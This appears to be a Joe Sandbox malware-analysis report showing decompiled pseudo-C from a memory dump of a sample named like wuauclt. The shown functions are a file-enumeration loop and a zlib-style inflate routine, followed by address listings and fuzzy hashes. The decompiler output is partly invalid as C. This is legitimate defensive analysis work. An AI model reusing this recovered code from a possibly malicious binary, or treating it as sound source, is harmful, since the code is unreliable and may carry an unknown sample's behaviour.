												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E002644B0(_t79, _t106, _t103 + _t96 * 4, _t65 - _t96, 4, E0025F6F7);
									}
								} else {
									_push(_t55);
									_t57 = E0025F89F(_t79, _t90, _t106, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E0025F89F(_t79, _t88, 0, _t79, 0, 0);
								}
							}
							_pop(_t114);
							__eflags = _v12 ^ _t118;
							return E00257097(_v12 ^ _t118, _t114);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}


















































                                                0x0025f8a4
                                                0x0025f8a5
                                                0x0025f8a8
                                                0x0025f8a8
                                                0x0025f8ab
                                                0x0025f8ab
                                                0x0025f8ad
                                                0x0025f8ae
                                                0x0025f8b7
                                                0x0025f8b8
                                                0x0025f8bb
                                                0x0025f8be
                                                0x0025f8c3
                                                0x0025f8ca
                                                0x0025f8cc
                                                0x0025f8cf
                                                0x0025f8d9
                                                0x0025f8dc
                                                0x0025f8dd
                                                0x0025f8df
                                                0x0025f8f3
                                                0x0025f8f3
                                                0x0025f8f6
                                                0x0025f900
                                                0x0025f905
                                                0x0025f908
                                                0x0025f90a
                                                0x00000000
                                                0x0025f90c
                                                0x0025f910
                                                0x0025f919
                                                0x0025f91f
                                                0x00000000
                                                0x0025f922
                                                0x0025f8e1
                                                0x0025f8e1
                                                0x0025f8e7
                                                0x0025f8ec
                                                0x0025f8ef
                                                0x0025f8f1
                                                0x0025f928
                                                0x0025f92a
                                                0x0025f92b
                                                0x0025f92c
                                                0x0025f92d
                                                0x0025f92e
                                                0x0025f92f
                                                0x0025f934
                                                0x0025f938
                                                0x0025f93a
                                                0x0025f940
                                                0x0025f947
                                                0x0025f94a
                                                0x0025f94d
                                                0x0025f94e
                                                0x0025f951
                                                0x0025f952
                                                0x0025f955
                                                0x0025f956
                                                0x0025f977
                                                0x0025f977
                                                0x0025f979
                                                0x00000000
                                                0x00000000
                                                0x0025f95e
                                                0x0025f960
                                                0x0025f962
                                                0x0025f964
                                                0x0025f966
                                                0x0025f968
                                                0x0025f96a
                                                0x0025f975
                                                0x00000000
                                                0x0025f975
                                                0x0025f96a
                                                0x0025f966
                                                0x00000000
                                                0x0025f962
                                                0x0025f97b
                                                0x0025f97d
                                                0x0025f980
                                                0x0025f999
                                                0x0025f999
                                                0x0025f99b
                                                0x0025f99e
                                                0x0025f9ae
                                                0x0025f9b0
                                                0x0025f9b0
                                                0x0025f9a0
                                                0x0025f9a0
                                                0x0025f9a3
                                                0x00000000
                                                0x0025f9a5
                                                0x0025f9a5
                                                0x0025f9a8
                                                0x00000000
                                                0x0025f9aa
                                                0x0025f9aa
                                                0x0025f9aa
                                                0x0025f9a8
                                                0x0025f9a3
                                                0x0025f9b6
                                                0x0025f9be
                                                0x0025f9c2
                                                0x0025f9d0
                                                0x0025f9d5
                                                0x0025f9ea
                                                0x0025f9ec
                                                0x0025f9f2
                                                0x0025f9f5
                                                0x0025fa27
                                                0x0025fa27
                                                0x0025fa29
                                                0x0025fa2c
                                                0x0025fa32
                                                0x0025fa32
                                                0x0025fa39
                                                0x0025fa53
                                                0x0025fa53
                                                0x0025fa62
                                                0x0025fa67
                                                0x0025fa6a
                                                0x0025fa6c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025fa3b
                                                0x0025fa3b
                                                0x0025fa41
                                                0x0025fa43
                                                0x00000000
                                                0x0025fa45
                                                0x0025fa45
                                                0x0025fa48
                                                0x00000000
                                                0x0025fa4a
                                                0x0025fa4a
                                                0x0025fa51
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025fa51
                                                0x0025fa48
                                                0x0025fa43
                                                0x00000000
                                                0x0025fa6e
                                                0x0025fa76
                                                0x0025fa7c
                                                0x0025fa7e
                                                0x0025fa7e
                                                0x0025fa86
                                                0x0025fa8b
                                                0x0025fa93
                                                0x0025fa96
                                                0x0025fa98
                                                0x0025faac
                                                0x0025fab1
                                                0x0025f9f7
                                                0x0025f9f7
                                                0x0025f9fb
                                                0x0025fa03
                                                0x0025fa03
                                                0x0025fa03
                                                0x0025fa05
                                                0x0025fa08
                                                0x0025fa0b
                                                0x0025fa0b
                                                0x0025f982
                                                0x0025f985
                                                0x0025f987
                                                0x00000000
                                                0x0025f989
                                                0x0025f989
                                                0x0025f98f
                                                0x0025f994
                                                0x0025f987
                                                0x0025fa17
                                                0x0025fa18
                                                0x0025fa23
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0025f8f1
                                                0x0025f8c5
                                                0x0025f8c7
                                                0x0025f923
                                                0x0025f927
                                                0x0025f927
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .
                                                • API String ID: 0-248832578
                                                • Opcode ID: add486d46117c03a50e97a3461f9e70f6878f714dffc4f33e5dad22aa9430adb
                                                • Instruction ID: b2e5cc4b3bd383198311ef01b8195d2f604f023cba0bc861fe3e456441c3a2d1
                                                • Opcode Fuzzy Hash: add486d46117c03a50e97a3461f9e70f6878f714dffc4f33e5dad22aa9430adb
                                                • Instruction Fuzzy Hash: F731247282024ABFCB649E78CD88EFA7BBDDF85305F1001A8FC5897251E6319E58CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 002517C0 Relevance: 3.2, Strings: 2, Instructions: 724COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E002517C0() {
				signed int* _t453;
				signed int _t455;
				intOrPtr _t457;
				signed int _t458;
				signed int _t459;
				signed int* _t468;
				signed int _t470;
				signed int _t472;
				signed int _t504;
				void* _t510;

				_t453 =  *(_t510 + 0x38);
				_t468 =  *(_t510 + 0x38);
				_t504 = _t468[7];
				 *(_t510 + 8) =  *_t453;
				_t470 = _t468[0xd];
				 *(_t510 + 0x10) = _t468[8];
				_t455 = _t468[0xc];
				 *(_t510 + 0x14) = _t453[1];
				 *(_t510 + 0x44) = _t470;
				if(_t470 >= _t455) {
					_t457 = _t468[0xb] - _t470;
				} else {
					_t457 = _t455 - _t470 - 1;
				}
				 *((intOrPtr*)(_t510 + 0x1c)) = _t457;
				while(1) {
					L4:
					_t458 =  *_t468;
					if(_t458 > 9) {
						break;
					}
					switch( *((intOrPtr*)(_t458 * 4 +  &M00252490))) {
						case 0:
							_t500 =  *(_t510 + 0x18);
							if(_t504 >= 3) {
								goto L12;
							} else {
								_t464 =  *(_t510 + 0x14);
								_t495 =  *(_t510 + 0x10);
								while(_t464 != 0) {
									_t464 = _t464 - 1;
									 *(_t510 + 0x4c) = 0;
									_t491 = 0 << _t504;
									_t504 = 8 + _t504;
									 *(_t510 + 0x14) = _t464;
									_t500 = _t500 | _t491;
									_t495 = _t495 + 1;
									 *(_t510 + 0x18) = _t500;
									 *(_t510 + 0x10) = _t495;
									if(_t504 < 3) {
										continue;
									} else {
										L12:
										_t462 = _t500 & 0x00000007;
										_t463 = _t462 >> 1;
										_t468[6] = _t462 & 0x00000001;
										if(_t463 > 3) {
											goto L4;
										} else {
											switch( *((intOrPtr*)(_t463 * 4 +  &M002524B8))) {
												case 0:
													goto L14;
												case 1:
													goto L15;
												case 2:
													goto L17;
												case 3:
													goto L100;
											}
										}
									}
									goto L127;
								}
								_t465 =  *(_t510 + 0x48);
								_t468[8] = _t500;
								_t468[7] = _t504;
								 *(4 + _t465) = 0;
								 *((intOrPtr*)(8 + _t465)) =  *((intOrPtr*)(8 + _t465)) + _t495 -  *_t465;
								 *_t465 = _t495;
								_t468[0xd] =  *(_t510 + 0x44);
								return E002535B0(_t468, _t465,  *(_t510 + 0x4c));
							}
							goto L127;
						case 1:
							__esi =  *(__esp + 0x18);
							__edi =  *(__esp + 0x14);
							__eax =  *(__esp + 0x10);
							if(__ebp >= 0x20) {
								L21:
								__edx = __esi;
								__ecx = __esi;
								__edx =  !__esi;
								__ecx = __esi & 0x0000ffff;
								 !__esi >> 0x10 =  !__esi >> 0x00000010 ^ __ecx;
								if(( !__esi >> 0x00000010 ^ __ecx) != 0) {
									__ecx =  *(__esp + 0x48);
									 *__ebx = 9;
									__edx = __eax;
									 *(__ecx + 0x18) = "invalid stored block lengths";
									__ebx[8] = __esi;
									__ebx[7] = __ebp;
									__esi =  *__ecx;
									__ebp =  *(8 + __ecx);
									__edx = __eax -  *__ecx;
									__ebp = __eax -  *__ecx +  *(8 + __ecx);
									 *__ecx = __eax;
									__eax =  *(__esp + 0x48);
									 *(4 + __ecx) = __edi;
									 *(8 + __ecx) = __ebp;
									__ebx[0xd] =  *(__esp + 0x48);
									__eax = E002535B0(__ebx, __ecx, 0xfffffffd);
									_pop(__edi);
									_pop(__esi);
									return __eax;
								} else {
									__ebp = 0;
									__eax = __ecx;
									__ebx[1] = __ecx;
									 *(__esp + 0x18) = 0;
									if(__ecx == 0) {
										goto L48;
									} else {
										__eax = 2;
										 *__ebx = 2;
									}
									goto L4;
								}
							} else {
								while(1) {
									__edx = 0;
									if(__edi == 0) {
										break;
									}
									__ecx = 0;
									 *(__esp + 0x4c) = 0;
									__cl =  *__eax;
									__edi = __edi - 1;
									__edx = 0;
									__ecx = __ebp;
									__edx = 0 << __cl;
									__ebp = 8 + __ebp;
									 *(__esp + 0x14) = __edi;
									__esi = __esi | 0 << __cl;
									__eax = __eax + 1;
									 *(__esp + 0x10) = __eax;
									if(__ebp < 0x20) {
										continue;
									} else {
										goto L21;
									}
									goto L127;
								}
								__ecx =  *(__esp + 0x48);
								__ebx[8] = __esi;
								__ebx[7] = __ebp;
								__esi =  *__ecx;
								__ebp =  *(8 + __ecx);
								 *(4 + __ecx) = 0;
								__edx = __eax;
								__edx = __eax -  *__ecx;
								 *__ecx = __eax;
								__eax =  *(__esp + 0x44);
								__ebp = __edx +  *(8 + __ecx);
								__edx =  *(__esp + 0x4c);
								 *(8 + __ecx) = __ebp;
								__ebx[0xd] =  *(__esp + 0x44);
								__eax = E002535B0(__ebx, __ecx,  *(__esp + 0x4c));
								_pop(__edi);
								_pop(__esi);
								return __eax;
							}
							goto L127;
						case 2:
							__edi =  *(__esp + 0x14);
							if(__edi == 0) {
								__ecx =  *(__esp + 0x18);
								__eax =  *(__esp + 0x48);
								__ebx[8] =  *(__esp + 0x18);
								__ecx =  *(__esp + 0x10);
								__ebx[7] = __ebp;
								__esi =  *__eax;
								__ebp =  *(__eax + 8);
								__edx = __ecx;
								__edx = __ecx -  *__eax;
								 *__eax = __ecx;
								__ecx =  *(__esp + 0x44);
								__ebp = __edx +  *(__eax + 8);
								__edx =  *(__esp + 0x4c);
								 *(__eax + 4) = 0;
								 *(__eax + 8) = __ebp;
								__ebx[0xd] =  *(__esp + 0x44);
								__eax = E002535B0(__ebx, __eax,  *(__esp + 0x4c));
								_pop(__edi);
								_pop(__esi);
								return __eax;
							} else {
								__ecx =  *(__esp + 0x1c);
								if(__ecx != 0) {
									L43:
									__eax = __ebx[1];
									 *(__esp + 0x4c) = 0;
									if(__eax > __edi) {
										__eax = __edi;
									}
									if(__eax > __ecx) {
										__eax = __ecx;
									}
									__esi =  *(__esp + 0x10);
									__edi =  *(__esp + 0x44);
									__ecx = __eax;
									__edx = __ecx;
									__ecx = __ecx >> 2;
									__eax = memcpy( *(__esp + 0x44), __esi, __ecx << 2);
									__edi = __esi + __ecx;
									__edi = __esi + __ecx + __ecx;
									__ecx = 0;
									__ecx = __edx;
									__edx =  *(__esp + 0x1c);
									__ecx = __ecx & 0x00000003;
									__edx =  *(__esp + 0x1c) - __eax;
									__eax = memcpy(__edi, __esi, __ecx);
									__esi + __ecx = __esi + __ecx + __ecx;
									0 =  *(__esp + 0x10);
									__edi =  *(__esp + 0x14);
									__esi =  *(__esp + 0x44);
									__ecx = __eax +  *(__esp + 0x10);
									 *(__esp + 0x10) = __eax +  *(__esp + 0x10);
									__ecx = __ebx[1];
									__edi =  *(__esp + 0x14) - __eax;
									__esi =  *(__esp + 0x44) + __eax;
									__ecx = __ebx[1] - __eax;
									 *(__esp + 0x14) = __edi;
									 *(__esp + 0x44) = __esi;
									 *(__esp + 0x1c) = __edx;
									__ebx[1] = __ecx;
									if(__ecx == 0) {
										L48:
										__ebx[6] =  ~(__ebx[6]);
										asm("sbb eax, eax");
										__eax =  ~(__ebx[6]) & 0x00000007;
										 *__ebx =  ~(__ebx[6]) & 0x00000007;
									}
									goto L4;
								} else {
									__ecx = __ebx[0xb];
									__edx =  *(__esp + 0x44);
									if(__edx != __ecx) {
										L32:
										__eax =  *(__esp + 0x4c);
										__edi =  *(__esp + 0x48);
										__ebx[0xd] = __edx;
										__eax = E002535B0(__ebx, __edi,  *(__esp + 0x4c));
										__edx = __ebx[0xd];
										__esi = __ebx[0xc];
										 *(__esp + 0x4c) = __eax;
										 *(__esp + 0x44) = __edx;
										if(__edx >= __esi) {
											__ecx = __ebx[0xb];
											__ecx = __ebx[0xb] - __edx;
										} else {
											__esi = __esi - __edx;
											__ecx = __esi - __edx - 1;
										}
										__eax = __ebx[0xb];
										 *(__esp + 0x1c) = __ecx;
										 *(__esp + 0x20) = __eax;
										if(__edx == __eax) {
											__eax = __ebx[0xa];
											if(__esi != __eax) {
												__edx = __eax;
												 *(__esp + 0x44) = __edx;
												if(__edx >= __esi) {
													__ecx =  *(__esp + 0x20);
													__ecx =  *(__esp + 0x20) - __edx;
												} else {
													__esi = __esi - __edx;
													__ecx = __esi;
												}
												 *(__esp + 0x1c) = __ecx;
											}
										}
										if(__ecx == 0) {
											__eax =  *(__esp + 0x18);
											__ecx =  *(__esp + 0x14);
											__ebx[8] =  *(__esp + 0x18);
											__eax =  *(__esp + 0x10);
											__ebx[7] = __ebp;
											__ebp =  *__edi;
											__esi =  *(__edi + 8);
											 *(__edi + 4) =  *(__esp + 0x14);
											__ecx = __eax;
											 *__edi = __eax;
											__ecx = __eax -  *__edi;
											__esi =  *(__edi + 8) + __eax -  *__edi;
											 *(__edi + 8) =  *(__edi + 8) + __eax -  *__edi;
											__ebx[0xd] = __edx;
											__edx =  *(__esp + 0x4c);
											__eax = E002535B0(__ebx, __edi,  *(__esp + 0x4c));
											_pop(__edi);
											_pop(__esi);
											return __eax;
										} else {
											__edi =  *(__esp + 0x14);
											goto L43;
										}
									} else {
										__eax = __ebx[0xc];
										__esi = __ebx[0xa];
										if(__eax == __esi) {
											goto L32;
										} else {
											__edx = __esi;
											 *(__esp + 0x44) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
											} else {
												__eax = __eax - __edx;
												__ecx = __eax;
											}
											 *(__esp + 0x1c) = __ecx;
											if(__ecx != 0) {
												goto L43;
											} else {
												goto L32;
											}
										}
									}
								}
							}
							goto L127;
						case 3:
							__edi =  *(__esp + 0x18);
							if(__ebp >= 0xe) {
								L53:
								__eax = __edi;
								__eax = __edi & 0x00003fff;
								__ecx = __eax;
								__ebx[1] = __eax;
								__ecx = __eax & 0x0000001f;
								if(__ecx > 0x1d) {
									L107:
									__eax =  *(__esp + 0x48);
									__ecx =  *(__esp + 0x14);
									 *__ebx = 9;
									 *(__eax + 0x18) = "too many length or distance symbols";
									__ebx[8] = __edi;
									__ebx[7] = __ebp;
									__esi =  *__eax;
									__ebp =  *(__eax + 8);
									 *(__eax + 4) =  *(__esp + 0x14);
									__ecx =  *(__esp + 0x14);
									__edx = __ecx;
									 *__eax = __ecx;
									__ecx =  *(__esp + 0x4c);
									__edx = __edx -  *__eax;
									__ebp = __edx +  *(__eax + 8);
									 *(__eax + 8) = __edx +  *(__eax + 8);
									__ebx[0xd] =  *(__esp + 0x4c);
									__eax = E002535B0(__ebx, __eax, 0xfffffffd);
									_pop(__edi);
									_pop(__esi);
									return __eax;
								} else {
									__eax = __eax & 0x000003e0;
									if((__eax & 0x000003e0) > 0x3a0) {
										goto L107;
									} else {
										__esi =  *(__esp + 0x48);
										_push(4);
										__eax = __eax >> 5;
										__eax = __eax & 0x0000001f;
										__eax = __eax + __ecx + 0x102;
										__ecx =  *(__esi + 0x28);
										_push(__eax);
										_push( *(__esi + 0x28));
										__eax =  *((intOrPtr*)(__esi + 0x20))();
										__esp = __esp + 0xc;
										__ebx[3] = __eax;
										if(__eax == 0) {
											__eax =  *(__esp + 0x14);
											__ebx[8] = __edi;
											__ebx[7] = __ebp;
											__edi =  *__esi;
											__edx =  *(__esi + 8);
											 *(__esi + 4) =  *(__esp + 0x14);
											__eax =  *(__esp + 0x10);
											__eax = __eax -  *__esi;
											 *__esi = __eax;
											__edx =  *(__esi + 8) + __eax -  *__esi;
											 *(__esi + 8) =  *(__esi + 8) + __eax -  *__esi;
											__edx =  *(__esp + 0x50);
											__ebx[0xd] =  *(__esp + 0x50);
											__eax = E002535B0(__ebx, __esi, 0xfffffffc);
											_pop(__edi);
											_pop(__esi);
											return __eax;
										} else {
											__edi = __edi >> 0xe;
											__ebp = __ebp - 0xe;
											__ebx[2] = 0;
											 *__ebx = 4;
											goto L58;
										}
									}
								}
							} else {
								__esi =  *(__esp + 0x14);
								__eax =  *(__esp + 0x10);
								while(__esi != 0) {
									__ecx = 0;
									__esi = __esi - 1;
									__cl =  *__eax;
									 *(__esp + 0x4c) = 0;
									__edx = 0;
									__ecx = __ebp;
									__edx = 0 << __cl;
									__ebp = 8 + __ebp;
									 *(__esp + 0x14) = __esi;
									__edi = __edi | 0 << __cl;
									__eax = __eax + 1;
									 *(__esp + 0x10) = __eax;
									if(__ebp < 0xe) {
										continue;
									} else {
										goto L53;
									}
									goto L127;
								}
								__eax =  *(__esp + 0x48);
								__ecx =  *(__esp + 0x10);
								__ebx[8] = __edi;
								__ebx[7] = __ebp;
								__esi =  *__eax;
								__ebp =  *(__eax + 8);
								__edx = __ecx;
								 *__eax = __ecx;
								__ecx =  *(__esp + 0x44);
								__ebp = __edx +  *(__eax + 8);
								__edx =  *(__esp + 0x4c);
								 *(__eax + 4) = 0;
								 *(__eax + 8) = __ebp;
								__ebx[0xd] =  *(__esp + 0x44);
								__eax = E002535B0(__ebx, __eax,  *(__esp + 0x4c));
								_pop(__edi);
								_pop(__esi);
								return __eax;
							}
							goto L127;
						case 4:
							__edi =  *(__esp + 0x18);
							__esi =  *(__esp + 0x48);
							L58:
							__edx = __ebx[1];
							__eax = __ebx[2];
							__ebx[1] >> 0xa = 4 + (__ebx[1] >> 0xa);
							if(__ebx[2] >= 4 + (__ebx[1] >> 0xa)) {
								L64:
								__ecx = __ebx[2];
								__eax = 0x13;
								if(__ebx[2] < 0x13) {
									do {
										__ecx = __ebx[2];
										__edx =  *(0x2692f4 + __ebx[2] * 4);
										__ecx = __ebx[3];
										 *(__ebx[3] +  *(0x2692f4 + __ebx[2] * 4) * 4) = 0;
										__edx = __ebx[2];
										__edx = __ebx[2] + 1;
										__ecx = __edx;
										__ebx[2] = __edx;
									} while (__edx < 0x13);
								}
								__edx = __ebx[9];
								__ecx =  &(__ebx[5]);
								__eax =  &(__ebx[4]);
								__edx = __ebx[3];
								__ebx[4] = 7;
								__eax = E00252E80(__ebx[3],  &(__ebx[4]),  &(__ebx[5]), __ebx[9], __esi);
								 *(__esp + 0x18) = __eax;
								if(__eax != 0) {
									if( *(__esp + 0x18) == 0xfffffffd) {
										__edx = __ebx[3];
										__eax =  *(__esi + 0x28);
										_push(__ebx[3]);
										_push( *(__esi + 0x28));
										__eax =  *((intOrPtr*)(__esi + 0x24))();
										__esp = __esp + 8;
										 *__ebx = 9;
									}
									__eax =  *(__esp + 0x10);
									__ecx =  *(__esp + 0x14);
									__ebx[8] = __edi;
									__ebx[7] = __ebp;
									__edi =  *__esi;
									__edx = __eax;
									 *(__esi + 4) =  *(__esp + 0x14);
									__ecx =  *(__esi + 8);
									__edx = __eax -  *__esi;
									 *__esi = __eax;
									__eax =  *(__esp + 0x44);
									__ecx =  *(__esi + 8) + __edx;
									 *(__esi + 8) =  *(__esi + 8) + __edx;
									__ecx =  *(__esp + 0x18);
									__ebx[0xd] =  *(__esp + 0x44);
									__eax = E002535B0(__ebx, __esi,  *(__esp + 0x18));
									_pop(__edi);
									_pop(__esi);
									return __eax;
								} else {
									__ebx[2] = __eax;
									 *__ebx = 5;
									goto L69;
								}
							} else {
								do {
									if(__ebp >= 3) {
										goto L63;
									} else {
										__eax =  *(__esp + 0x10);
										while(1) {
											__ecx =  *(__esp + 0x14);
											if(__ecx == 0) {
												goto L111;
											}
											__edx = __ecx;
											__ecx = 0;
											__cl =  *__eax;
											 *(__esp + 0x14) = __edx;
											__edx = 0;
											__ecx = __ebp;
											__ebp = 8 + __ebp;
											__edx = 0 << __cl;
											 *(__esp + 0x4c) = 0;
											__edi = __edi | 0 << __cl;
											__eax = __eax + 1;
											 *(__esp + 0x10) = __eax;
											if(__ebp < 3) {
												continue;
											} else {
												goto L63;
											}
											goto L127;
										}
										goto L111;
									}
									goto L127;
									L63:
									__ecx = __ebx[2];
									__eax = __edi;
									__eax = __edi & 0x00000007;
									__ebp = __ebp - 3;
									__edx =  *(0x2692f4 + __ebx[2] * 4);
									__ecx = __ebx[3];
									__edi = __edi >> 3;
									 *(__ebx[3] +  *(0x2692f4 + __ebx[2] * 4) * 4) = __eax;
									__edx = __ebx[2];
									__edx = __ebx[2] + 1;
									__ebx[2] = __edx;
									__eax = __edx;
									__ebx[1] = __ebx[1] >> 0xa;
									__edx = 4 + (__ebx[1] >> 0xa);
								} while (__eax < 4 + (__ebx[1] >> 0xa));
								goto L64;
							}
							goto L127;
						case 5:
							__edi =  *(__esp + 0x18);
							__esi =  *(__esp + 0x48);
							L69:
							__eax = __ebx[1];
							__ecx = __ebx[2];
							__edx = __eax;
							__eax = __eax & 0x0000001f;
							__edx = __edx >> 5;
							if(__ebx[2] >= __eax) {
								L88:
								__ecx = __ebx[9];
								__eax = __ebx[1];
								__edx = __esp + 0x40;
								__ecx = __esp + 0x44;
								__edx = __esp + 0x2c;
								__ecx = __esp + 0x30;
								__edx = __ebx[3];
								__eax = __eax >> 5;
								__ecx = __eax >> 0x00000005 & 0x0000001f;
								__eax = __eax & 0x0000001f;
								__ecx = __ecx + 1;
								__eax = __eax + 0x101;
								__ebx[5] = 0;
								 *(__esp + 0x44) = 9;
								 *(__esp + 0x40) = 6;
								__eax = E002533F0(__eax, __ecx, __ebx[3], __ecx, __esp + 0x2c, __ecx, __esp + 0x40, __ebx[9], __esi);
								 *(__esp + 0x18) = __eax;
								if(__eax != 0) {
									if( *(__esp + 0x18) == 0xfffffffd) {
										__ecx = __ebx[3];
										__edx =  *(__esi + 0x28);
										_push(__ebx[3]);
										_push( *(__esi + 0x28));
										__eax =  *((intOrPtr*)(__esi + 0x24))();
										__esp = __esp + 8;
										 *__ebx = 9;
									}
									__eax =  *(__esp + 0x14);
									__ebx[8] = __edi;
									__ebx[7] = __ebp;
									__edi =  *__esi;
									__edx =  *(__esi + 8);
									 *(__esi + 4) =  *(__esp + 0x14);
									__eax =  *(__esp + 0x10);
									__ecx = __eax;
									 *__esi = __eax;
									__eax =  *(__esp + 0x18);
									__ecx = __ecx -  *__esi;
									__edx =  *(__esi + 8) + __ecx;
									 *(__esi + 8) =  *(__esi + 8) + __ecx;
									__edx =  *(__esp + 0x48);
									__ebx[0xd] =  *(__esp + 0x48);
									__eax = E002535B0(__ebx, __esi,  *(__esp + 0x18));
									_pop(__edi);
									_pop(__esi);
									return __eax;
								} else {
									__edx =  *(__esp + 0x38);
									__eax =  *(__esp + 0x3c);
									__ecx =  *(__esp + 0x1c);
									__edx =  *(__esp + 0x28);
									__eax = E00252670( *(__esp + 0x28),  *(__esp + 0x1c),  *(__esp + 0x3c),  *(__esp + 0x28), __esi);
									if(__eax == 0) {
										__eax =  *(__esp + 0x10);
										__ecx =  *(__esp + 0x14);
										__ebx[8] = __edi;
										__ebx[7] = __ebp;
										__edi =  *__esi;
										__edx = __eax;
										 *(__esi + 4) =  *(__esp + 0x14);
										__ecx =  *(__esi + 8);
										__edx = __eax -  *__esi;
										 *__esi = __eax;
										__eax =  *(__esp + 0x44);
										__ecx =  *(__esi + 8) + __edx;
										 *(__esi + 8) =  *(__esi + 8) + __edx;
										__ebx[0xd] =  *(__esp + 0x44);
										__eax = E002535B0(__ebx, __esi, 0xfffffffc);
										_pop(__edi);
										_pop(__esi);
										return __eax;
									} else {
										__ebx[1] = __eax;
										__eax = __ebx[3];
										__ecx =  *(__esi + 0x28);
										_push(__ebx[3]);
										_push( *(__esi + 0x28));
										__eax =  *((intOrPtr*)(__esi + 0x24))();
										__esp = __esp + 8;
										 *__ebx = 6;
										goto L92;
									}
								}
							} else {
								do {
									__eax = __ebx[4];
									if(__ebp >= __eax) {
										L73:
										__eax =  *(0x2723c8 + __eax * 4);
										__ecx = __ebx[5];
										__eax = __eax & __edi;
										__edx = 0;
										__eax = __ebx[5] + __eax * 8;
										 *(__esp + 0x18) = 0;
										__eax =  *(__eax + 4);
										 *(__esp + 0x34) = __eax;
										if(__eax >= 0x10) {
											__ecx = 7;
											if(__eax != 0x12) {
												__ecx = __eax - 0xe;
											}
											__eax = __eax - 0x12;
											 *(__esp + 0x1c) = __ecx;
											__eax =  ~__eax;
											asm("sbb eax, eax");
											__ecx = __edx + __ecx;
											__al = __al & 0x000000f8;
											 *(__esp + 0x20) = __ecx;
											__eax = __eax + 0xb;
											if(__ebp >= __ecx) {
												L81:
												__ecx = __edx;
												__edi = __edi >> __cl;
												 *(__esp + 0x1c) =  *(0x2723c8 +  *(__esp + 0x1c) * 4);
												__ecx =  *(0x2723c8 +  *(__esp + 0x1c) * 4) & __edi;
												__eax = __eax + ( *(0x2723c8 +  *(__esp + 0x1c) * 4) & __edi);
												__ecx =  *(__esp + 0x1c);
												__edi = __edi >> __cl;
												__ecx =  *(__esp + 0x1c) + __edx;
												 *(__esp + 0x18) = __eax;
												__ebp = __ebp -  *(__esp + 0x1c) + __edx;
												__ecx = __ebx[2];
												 *(__esp + 0x1c) = __ebx[2];
												__ecx = __ebx[1];
												__edx = __ecx;
												__ecx = __ecx & 0x0000001f;
												__edx = __edx >> 5;
												__ecx = __edx + __ecx + 0x102;
												__edx =  *(__esp + 0x1c);
												if(__eax > __ecx) {
													L112:
													__edx = __ebx[3];
													__eax =  *(__esi + 0x28);
													_push(__ebx[3]);
													_push( *(__esi + 0x28));
													__eax =  *((intOrPtr*)(__esi + 0x24))();
													__eax =  *(__esp + 0x18);
													__ecx =  *(__esp + 0x1c);
													 *__ebx = 9;
													 *(__esi + 0x18) = "invalid bit length repeat";
													__ebx[8] = __edi;
													__ebx[7] = __ebp;
													__edi =  *__esi;
													__edx = __eax;
													 *(__esi + 4) =  *(__esp + 0x1c);
													__ecx =  *(__esi + 8);
													__edx = __eax -  *__esi;
													 *__esi = __eax;
													__eax =  *(__esp + 0x4c);
													__ecx =  *(__esi + 8) + __edx;
													 *(__esi + 8) =  *(__esi + 8) + __edx;
													__ebx[0xd] =  *(__esp + 0x4c);
													__eax = E002535B0(__ebx, __esi, 0xfffffffd);
													_pop(__edi);
													_pop(__esi);
													return __eax;
												} else {
													if( *(__esp + 0x34) != 0x10) {
														__eax =  *(__esp + 0x1c);
														__ecx = 0;
														goto L86;
													} else {
														__eax = __edx;
														if(__eax < 1) {
															goto L112;
														} else {
															__ecx = __ebx[3];
															__ecx =  *(__ebx[3] + __eax * 4 - 4);
															do {
																L86:
																__edx = __ebx[3];
																__eax = __eax + 1;
																 *(__ebx[3] + __eax * 4 - 4) = __ecx;
																__edx =  *(__esp + 0x18);
																__edx =  *(__esp + 0x18) - 1;
																 *(__esp + 0x18) = __edx;
															} while (__edx != 0);
															goto L87;
														}
													}
												}
											} else {
												while(1) {
													__ecx =  *(__esp + 0x14);
													if(__ecx == 0) {
														goto L111;
													}
													__edx = __ecx;
													__ecx = 0;
													__edx = __edx - 1;
													 *(__esp + 0x4c) = 0;
													 *(__esp + 0x14) = __edx;
													__edx =  *(__esp + 0x10);
													__cl =  *( *(__esp + 0x10));
													__edx = 0;
													__ecx = __ebp;
													__edx = 0 << __cl;
													__ecx =  *(__esp + 0x10);
													__ebp = 8 + __ebp;
													__edi = __edi | 0 << __cl;
													__ecx =  *(__esp + 0x10) + 1;
													 *(__esp + 0x10) =  *(__esp + 0x10) + 1;
													__ecx =  *(__esp + 0x20);
													if(__ebp <  *(__esp + 0x20)) {
														continue;
													} else {
														__edx =  *(__esp + 0x18);
														goto L81;
													}
